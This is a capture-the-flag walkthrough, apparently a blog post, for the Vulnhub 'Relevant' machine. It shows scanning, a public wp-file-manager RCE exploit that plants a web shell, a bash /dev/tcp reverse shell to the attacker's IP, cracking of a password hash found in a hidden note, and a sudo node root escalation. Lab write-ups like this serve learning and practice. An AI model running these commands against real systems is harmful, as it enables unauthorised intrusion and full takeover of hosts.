Vulnhub - Relevant

You can find the machine there > Relevant

Summary

We start by finding a wordpress site and wpscan reveals a vulnerable plugin, this gives us a shell as www-data. First privesc is all about an exposed hash and final one is about node exploitation. Let’s pwn it! :sunglasses:

Enumeration/Reconnaissance

Let’s start as always with nmap.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
$ ip=192.168.1.15
$ nmap -p- --min-rate 10000 $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-07 12:36 EEST
Nmap scan report for relevant.zte.com.cn (192.168.1.15)
Host is up (0.00016s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:1E:5C:B7 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.41 seconds
$ nmap -p 22,80 -sC -sV -oN nmap/initial $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-07 12:37 EEST
Nmap scan report for relevant.zte.com.cn (192.168.1.15)
Host is up (0.00087s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Database Error

Let’s start the enumeration on port 80, once we visit the website we can see a “database error”:

A gobuster scan shows us that is a wordpress site! But nothing works.

1
2
3
4
5
6
$ gobuster dir -q -u http://$ip/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html
/wp-content (Status: 301)
/license.txt (Status: 200)
/wp-includes (Status: 301)
/readme.html (Status: 200)
/wp-admin (Status: 301)

If we run a wpscan scan we can see that can’t detect the wordpress site or the plugins:

1
2
3
$ wpscan --no-banner --url http://$ip/ -e ap,u

Scan Aborted: The remote website is up, but does not seem to be running WordPress.

After digging into the help page i found the solution:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
$ wpscan --no-banner --url http://$ip/ --force --plugins-detection aggressive -e ap,u
[+] URL: http://192.168.1.15/ [192.168.1.15]
[+] Started: Wed Oct  7 12:45:24 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: nginx/1.18.0 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] WordPress readme found: http://192.168.1.15/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.1.15/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

Fingerprinting the version - Time: 00:00:00 <========================================================================================================> (463 / 463) 100.00% Time: 00:00:00
[+] WordPress version 5.5.1 identified (Latest, released on 2020-09-01).
 | Found By: Style Etag (Aggressive Detection)
 |  - http://192.168.1.15/wp-admin/load-styles.php, Match: '5.5.1'
 | Confirmed By: Unique Fingerprinting (Aggressive Detection)
 |  - http://192.168.1.15/wp-admin/js/common.min.js md5sum is d882c62db3212caee8464d76f47eae4a

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Aggressive Methods)
<=====================================================================================================> (89276 / 89276) 100.00% Time: 00:02:03
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://192.168.1.15/wp-content/plugins/akismet/
 | Latest Version: 4.1.6 (up to date)
 | Last Updated: 2020-08-10T16:49:00.000Z
 | Readme: http://192.168.1.15/wp-content/plugins/akismet/readme.txt
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.1.15/wp-content/plugins/akismet/, status: 200
 |
 | Version: 4.1.6 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.1.15/wp-content/plugins/akismet/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://192.168.1.15/wp-content/plugins/akismet/readme.txt

[+] wp-file-manager
 | Location: http://192.168.1.15/wp-content/plugins/wp-file-manager/
 | Last Updated: 2020-09-14T19:30:00.000Z
 | Readme: http://192.168.1.15/wp-content/plugins/wp-file-manager/readme.txt
 | [!] The version is out of date, the latest version is 6.9
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.1.15/wp-content/plugins/wp-file-manager/, status: 200
 |
 | Version: 6.7 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.1.15/wp-content/plugins/wp-file-manager/readme.txt

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <===========================================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] No Users Found.

Shell as www-data

wp-file-manager seems vulnerable, after searching on google for possible exploits i found a RCE one! exploit

Let’s download it & run it:

1
2
3
4
5
6
$ wget -q https://raw.githubusercontent.com/w4fz5uck5/wp-file-manager-0day/master/elFinder.py
$ python elFinder.py http://$ip/
Usage: elFinder.py http://localhost
URL Shell: %s/wp-content/plugins/wp-file-manager/lib/files/x.php?cmd=<CMD>
$ whoami
www-data

Perfect, this shell seems unstable so let’s spawn a normal reverse shell:

1
bash -c 'bash -i >& /dev/tcp/192.168.1.14/5555 0>&1'

Let’s URL encode it:

1
2
$ urlencode "bash -c 'bash -i >& /dev/tcp/192.168.1.14/5555 0>&1'"
bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.1.14%2F5555%200%3E%261%27

& We have shell:

1
2
3
4
5
6
7
$ nc -lvp 5555
listening on [any] 5555 ...

www-data@relevant:~/html/wp-content/plugins/wp-file-manager/lib/files$ python3 -c 'import pty; pty.spawn("/bin/bash")'                
www-data@relevant:~/html/wp-content/plugins/wp-file-manager/lib/files$ whoami;id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Shell as news

This privesc is kinda tricky, user “h4x0r” has a hidden directory named ...:

1
2
3
4
5
6
7
8
9
10
www-data@relevant:/home/h4x0r$ ls -la
total 28
drwxr-xr-x 4 h4x0r h4x0r 4096 Sep 21 20:16 .
drwxr-xr-x 5 root  root  4096 Sep 21 19:50 ..
drwxr-xr-x 2 h4x0r h4x0r 4096 Sep 21 20:15 ... <---
lrwxrwxrwx 1 h4x0r h4x0r    9 Sep 21 20:16 .bash_history -> /dev/null
-rw-r--r-- 1 h4x0r h4x0r  220 Sep 21 19:50 .bash_logout
-rw-r--r-- 1 h4x0r h4x0r 3771 Sep 21 19:50 .bashrc
drwxrwxr-x 3 h4x0r h4x0r 4096 Sep 21 20:06 .local
-rw-r--r-- 1 h4x0r h4x0r  807 Sep 21 19:50 .profile

Into this directory, a note.txt exists:

1
2
www-data@relevant:/home/h4x0r/...$ cat note.txt
news : 4C7EB317A4F4322C325165B4217C436D6E0FA3F1

Let’s use crackstation to crack it. We have the password backdoorlover Now we can switch to user news:

1
2
3
4
5
6
www-data@relevant:/home/h4x0r/...$ su - news
Password: backdoorlover

news@relevant:/home/h4x0r/...$ whoami;id
news
uid=9(news) gid=9(news) groups=9(news)

Shell as root

Checking sudo -l we can see that we can run node as root:

1
2
3
4
5
6
7
8
9
news@relevant:/home/h4x0r/...$ sudo -l
[sudo] password for news: backdoorlover

Matching Defaults entries for news on relevant:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User news may run the following commands on relevant:
    (ALL : ALL) /usr/bin/node

gtfobins page says how to exploit it:

1
2
3
4
news@relevant:/home/h4x0r/...$ sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)

Fun box! :smile: